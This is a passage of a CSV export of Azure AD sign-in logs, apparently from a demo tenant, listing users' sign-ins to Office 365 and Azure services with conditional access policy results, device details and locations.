'83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",fd7a6355-56f5-4bc2-9ad4-c2594b740f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,fd7a6355-56f5-4bc2-9ad4-c2594b740f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1968,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:03.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5b1b6256-f9a8-42ee-addf-6e38b1581b5e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",52a6664f-09a1-41b6-959f-775d28001000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,52a6664f-09a1-41b6-959f-775d28001000,SigninLogs,Sucess,33.7984581,-84.38828278
+1969,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:26.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,89c7469f-d07d-0000-5683-4ecd601c91ac,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",85789f99-3a4c-45a5-91bc-019427711100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,85789f99-3a4c-45a5-91bc-019427711100,SigninLogs,Sucess,33.7984581,-84.38828278
+1970,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:56.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8fbdb74c-7214-4790-b396-411dc46f90db,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Common Data Service,00000007-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",429b44fe-fb38-41be-832c-f14286601000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,429b44fe-fb38-41be-832c-f14286601000,SigninLogs,Sucess,50.6406517,5.572050095
+1971,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:46.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a4c8469f-a09b-0000-5421-74c39fdf33d2,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9e5b191300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,03932e54-fdb0-4c07-8405-8b9e5b191300,SigninLogs,Sucess,33.7984581,-84.38828278
+1972,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:57.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0cfe4b5b-09c7-4394-bb27-21b9e9121200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0cfe4b5b-09c7-4394-bb27-21b9e9121200,SigninLogs,Sucess,33.0175209,35.44601059
+1973,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:23.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5f6c9e20-6d16-4146-b72e-f90376fd5b2d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 14:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",41cc5746-ae7e-445a-962a-17f6347c1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,41cc5746-ae7e-445a-962a-17f6347c1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1974,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:44.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,37b440c6-5fca-4b04-845d-e14952332753,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfda3bbc-b55b-4a89-a1fb-2fc02d610f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,dfda3bbc-b55b-4a89-a1fb-2fc02d610f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1975,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:38.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e8540ab0-e521-4672-a430-677185f95043,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 